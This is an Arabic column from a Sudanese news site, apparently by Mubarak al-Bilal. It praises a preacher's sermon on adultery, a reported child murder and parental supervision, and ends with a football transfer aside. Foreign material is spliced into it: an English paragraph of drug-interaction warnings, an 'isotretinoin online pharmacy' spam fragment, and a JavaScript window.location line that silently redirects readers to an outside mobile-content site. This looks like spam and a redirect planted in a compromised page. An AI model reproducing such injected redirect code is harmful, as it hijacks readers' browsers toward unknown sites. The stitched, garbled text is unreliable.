سودانا فوق أونلاين

مبارك البلال يكتب بعنوان شكراً مولانا الدكتور احمد منصور

{

additional monitoring of your dose or condition may be needed if you are taking any other medicine for erectile dysfunction; certain antifungal medicines such as itraconazole or ketoconazole; macrolide antibiotics such as clarithromycin or erythromycin; medicine for high blood pressure; "water pills" such as bendrofluazide or hydrochlorothiazide; certain alpha-blocker medicines such as alfuzosin, doxazosin, prazosin, or terazosin; or hiv protease inhibitors such as ritonavir or indinavir.

مبارك البال‬ اسعدني ورفع معنوياتي كثيرا امس من خلال خطبة الجمعة بمسجد كبسور الشهير بأمبدة الحارة الاولي ، فضيلة مولانا الدكتور احمد منصور عبد الهادي عضو هيئة علماء السودان .. ويكفي فخرا هذا الرجل المتعلم دينيا ودنيويا ان مسجده ظل قبلة يتدافع حولها المصلون من كل مكان لانه يتحدث دائما بما يفيد الناس في امور دينهم ودنياهم .. وهو حاصل علي الدكتوراه في الشريعة والقانون (المركز القانوني لغير المسلم في الدولة الاسلامية) واشاد مولانا بما سطرته من نقد لبعض ائمة المساجد الذين يتحدثون في امور لا تفيد الناس في شئ.. ودافع مولانا عن صحيفة الدار وقال انها صحيفة هادفة وكشفت الكثير والخطير من عيوب هذا المجتمع الآمن والمطمئن وقال ان بعض الذين يهاجمونها يظلمونها لانها صحيفة هادفة وجادة ومفيدة .. واشاد بما سطرته حول مطالبتي لائمة المساجد والدعاة ، بافادة الناس والحديث في مواضيع هامة بدلا عن مهاجمة الدار.. وبدأ خطبته حول الزنا واستدل بآيات كريمات من سورتي الاسراء والمؤمنون .. ومن ثم تحدث عن الطفلة ذات الـ 7 شهور والتي قام بعض الوحوش البشرية باختطافها واغتصابها وقتلها كما اوردت الدار .. وتحدث باسهاب وقال ان المجتمع بدأت تظهر فيه اشياء غريبة بسبب غياب رب الاسرة والتربية غير السليمة وان النساء العاملات اصبحن يتركن اطفالهن دون رقيب وضرب مثلا بعربة الروضة وقال انها تبحث عن رب الاسرة او الام التي تقوم بايصال طفلتها الي الحافلة حتي الاطمئنان عليها .. وقال ان بعض الاباء لا يهتمون بتربية ابنائهم التربية الاسلامية السليمة وطالب اولياء الامور بمتابعة ابنائهم اين يذهبون واين يسهرون ومن يصادقون.

‭{‬ شكرا مولانا العالم الكبير الدكتور احمد منصور علي امثال تلك الخطب المفيدة .. نتمني من ذلك الداعية الذي خصص لنا اكثر من عشرين دقيقة في احدي الخطب للاساءة بالفاظ قبيحة ضد الدار تدخله تحت طائلة القانون الجنائي والقذف ، ان يحرص الجمعة القادمة باذن الله علي حضور احدي خطب مولانا احمد منصور حتي يتعلم واذا لم يفعل ذلك ساقوم بفتح بلاغ جنائي مدعم بشريط الفيديو والشهود. buy isotretinoin online uk pharmacy | low prices – point s

حاجة خارج النص:

‭{‬ هاتفني صديقي العزيز القطب الرياضي والمريخي الفخيم وأحد الذين يدخلون الابتسامة في قلوبنا بالوسط الرياضي معتصم ابو جميل غاضبا من ادارة المريخ التي تطالب هيثم بدفع تعويض لهم مقابل التنازل عنه وقال ابو جميل ان كل الاموال التي دفعها المريخ لهيثم في العامين لا تتجاوز الاربعمائة الف جنيه فقط.. لعب فيها البرنس موسما كاملا احرز فيه للمريخ كاس الممتاز بعد غياب طويل.. وتغيب لستة اشهر في الموسم  الثاني لمرض زوجته ومرضه شخصيا اذا كل ما يريده منه المريخ 5 اشهر فقط.. وقال ابو جميل ان هيثم مرر مئتي تمريرة باص قوون للاحمر والتمريرة الواحدة من البرنس بمائة الف جنيه ومعني ذلك ان لهيثم حقوقا لدي المريخ.. وطالب جمال الوالي بعدم الوقوف في مثل هذه القضايا الانصرافية.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

التعليقات مغلقة.